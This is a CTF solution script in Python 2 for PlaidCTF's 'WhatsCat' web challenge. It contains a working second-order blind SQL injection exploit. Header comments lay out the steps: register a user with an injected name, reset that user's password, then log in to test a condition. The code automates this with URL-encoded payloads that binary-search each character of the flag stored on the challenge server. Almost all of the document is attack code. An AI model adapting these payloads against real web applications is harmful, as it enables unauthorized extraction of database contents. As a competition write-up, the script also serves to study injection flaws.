PPP's WhatsCat Challenge Exploit by @ngocdh

1. #PPP's WhatsCat Challenge Exploit by @ngocdh
2. #http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
3. #
4. #Step 1 : Register with username "hn"
5. #Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
6. #Step 3 : Reset password of the 2nd user
7. #Step 4 : Log in with username hn and original password. If password is invalid then the condition is true (21 = length(flag))
8. #
9. #The flag table/column and length were found manually
10. #This code extracts only the flag
11.  
12. import urllib2
13. import string
14. import random
15.  
16. def idgen(size=6, chars=string.ascii_uppercase + string.digits):
17.   return ''.join(random.choice(chars) for _ in range(size))
18.  
19. def check(pos,d,u):
20.   id = idgen() + "hn"
21.  
22.   query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"
23.  
24.   url = "http://54.196.116.77/index.php?page=login"
25.  
26.   data_reg = "name="+id+"&pass=hn&email=hn&register=Register"
27.   data_reg2 = "name="+query+"&pass=hn&email=hn&register=Register"
28.   data_reset = "name="+query+"&reset=Forgot+Password&pass=&email="
29.   data_login = "name="+id+"&pass=hn&login=Login&email="
30.  
31.   a=urllib2.urlopen(url,data_reg).read()
32.   a=urllib2.urlopen(url,data_reg2).read()
33.   b=urllib2.urlopen(url,data_reset).read()
34.   c=urllib2.urlopen(url,data_login).read()
35.  
36.   if c.find("Welcome back")>0 and c.find("invalid")<0:
37.     return 0
38.   else:
39.     return 1
40.  
41. res = ""
42. for i in range(1,22):
43.   p=0
44.   q=255
45.   for x in range(0,8):
46.     n = (p+q)/2
47.     temp = check(str(i),str(p),str(n))
48.     q = n if temp==1 else q
49.     p = n+1 if temp==0 else p
50.   res = res + chr(p)
51.   print res